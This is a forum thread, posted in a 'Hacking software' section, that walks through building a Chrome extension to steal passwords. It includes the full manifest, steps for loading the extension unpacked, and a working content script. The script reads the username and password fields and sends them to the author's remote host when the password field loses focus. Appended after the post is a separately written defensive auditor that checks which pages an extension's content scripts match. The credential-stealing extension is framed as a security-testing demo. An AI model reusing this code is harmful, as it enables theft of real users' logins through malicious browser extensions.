
How to write plugins for Chrome

Thread in the "Hacking software" section, created by user eliuha, 14 Dec 2015.

  1. eliuha
    eliuha, Newbie
    Likes: 0
    I already wrote this at work, but I think the forum will find it interesting.
    If needed, I'll translate it into Russian.


    https://devcentral.f5.com/articles/diy-programmable-man-in-the-middle-for-security-testing-part-ii

    1. Create a folder on your hard drive
    2. Inside that folder, create a file named manifest.json
    3. Put the next code inside:
      {
        "manifest_version": 2,
        "name": "F5 Script Injector",
        "description": "Injects a JavaScript to the page. Created by Ilya Chernyakov ",
        "version": "2.0",
        "browser_action": {"default_icon": "Injection-icon.png"},
        "permissions": ["http://eliuha.com/extDemo/*"],
        "content_scripts": [{"matches": ["http://eliuha.com/extDemo/*"], "js": ["malicious_script.js"]}]
      }
    4. Create an image, for an icon, name it Injection-icon.png and save it to the same directory
    That’s it: you have a Chrome extension. Let’s see if it works.



    Loading extension to Chrome
    1. Type chrome://extensions in the address bar
    2. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
    3. Click Load unpacked extension… to pop up a file-selection dialog.
    4. Navigate to the directory in which your extension files live, and select it.
    Alternatively, you can drag and drop the directory where your extension files live onto chrome://extensions in your browser to load it.
    If the extension is valid, it will be loaded and be immediately active. If it's invalid, an error message will be displayed at the top of the page. Correct the error, and try again.
    Now you should see your icon, which is a filename you wrote in the default_icon directive in the manifest file on your browser’s bar. This means that we have our code running in the browser’s context.




    Stealing the password
    Our reason to create a Chrome extension was to steal our victim’s password. When the password is typed in the password field, it is stored in the DOM and we can use JavaScript to access it and send it to our “dropzone” location. In order to achieve that, we will have to inject JavaScript code into a webpage, and our extension will help us do that. Let's go to our manifest.json file and add the following lines:

    "content_scripts":[{"matches":["http://eliuha.com/extDemo/*"],"js":["malicious_script.js"]}]
    The code basically tells Chrome that if the URL matches the expression in the quotes, the Javascript should be injected.
    Note that manifest.json is a JSON data structure, and therefore, the format should look like this:

    {"key":"value","key":"value"}

    where each value, except the last one, is followed by a comma (,).



    After changing the manifest, we should create the malicious JavaScript code that we want to run.



    Malicious Script
    We will find all the text fields and send their text to some other website. We will assume that the username field and the password field are named “username” and “password” respectively. Let’s view the HTML on http://eliuha.com/extDemo/bank.html



    <input autocomplete="off" class="form-login" id="Username" name="username" size="30" value="">
    <input autocomplete="off" class="form-password" id="Password" name="password" size="30" value="">
    Note that the password field was intentionally created as an unprotected field omitting the type="password" to make our hacking easier.



    Let's write a simple script to get the values of the fields:

    //this part does all the password stealing and sends it to attackers website
    function grabCredentials() {
        var user = document.getElementsByName('username')[0].value;
        var pass = document.getElementsByName('password')[0].value;

        var theUrl = 'http://www.eliuha.com/hack/creds.jpg?user=' + user + '&pass=' + pass + '';

        var img = document.createElement('img');
        img.src = theUrl;
    }

    // event listener proxy
    function hook() {
        console.log("GrabCreds");
        grabCredentials();
    }

    //hooking when password field loses focus
    document.getElementsByName("password")[0].onblur = hook;


    The extension should be working
     
    14 Dec 2015
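
From the defender's side, the `content_scripts` entry in the manifest above is what to review before an unpacked extension is allowed in a browser. The following is an added example, not part of the original post or the F5 article: it reports which watched pages an extension's content scripts would be injected into. The function names `matchPatternToRegExp` and `auditManifest`, the simplified match-pattern handling and the `intranet.example` URL are assumptions made for illustration.

```javascript
// Added example (not from the original post): list which watched URLs an
// extension's content scripts would be injected into.
// Assumption: simplified match patterns (http/https only, ports ignored).
const escapeRe = (s) => s.replace(/[.+?^${}()|[\]\\]/g, "\\$&");

function matchPatternToRegExp(pattern) {
  if (pattern === "<all_urls>") return /^https?:\/\/.+/;
  const m = /^(\*|https?):\/\/(\*|(?:\*\.)?[^/*]+)(\/.*)$/.exec(pattern);
  if (!m) return null; // malformed or unsupported pattern
  const [, scheme, host, path] = m;
  const schemeRe = scheme === "*" ? "https?" : scheme;
  let hostRe = escapeRe(host);
  if (host === "*") hostRe = "[^/]+";
  else if (host.startsWith("*.")) hostRe = "(?:[^/]+\\.)?" + escapeRe(host.slice(2));
  // "*" in the path is a wildcard; everything else is literal.
  const pathRe = path.split("*").map(escapeRe).join(".*");
  return new RegExp("^" + schemeRe + "://" + hostRe + pathRe + "$");
}

function auditManifest(manifestText, watchedUrls) {
  const manifest = JSON.parse(manifestText);
  const findings = [];
  for (const cs of manifest.content_scripts || []) {
    for (const pattern of cs.matches || []) {
      const re = matchPatternToRegExp(pattern);
      const hits = re ? watchedUrls.filter((u) => re.test(u)) : [];
      // A wildcard host or <all_urls> is reported even without a watched hit.
      const broad = pattern === "<all_urls>" || /^[^:]+:\/\/\*\//.test(pattern);
      if (hits.length || broad) findings.push({ pattern, scripts: cs.js || [], hits, broad });
    }
  }
  return findings;
}

// Constructed sample: the manifest fields shown in the post.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "F5 Script Injector",
  permissions: ["http://eliuha.com/extDemo/*"],
  content_scripts: [{ matches: ["http://eliuha.com/extDemo/*"], js: ["malicious_script.js"] }],
});
// Watched pages: the demo page from the post plus a constructed placeholder.
const WATCHED_URLS = ["http://eliuha.com/extDemo/bank.html", "https://intranet.example/login"];

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST, WATCHED_URLS), null, 2));
```

Any finding whose `hits` include a login or payment page means the listed script files run in that page's DOM and can read its form fields, so they need a manual review.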
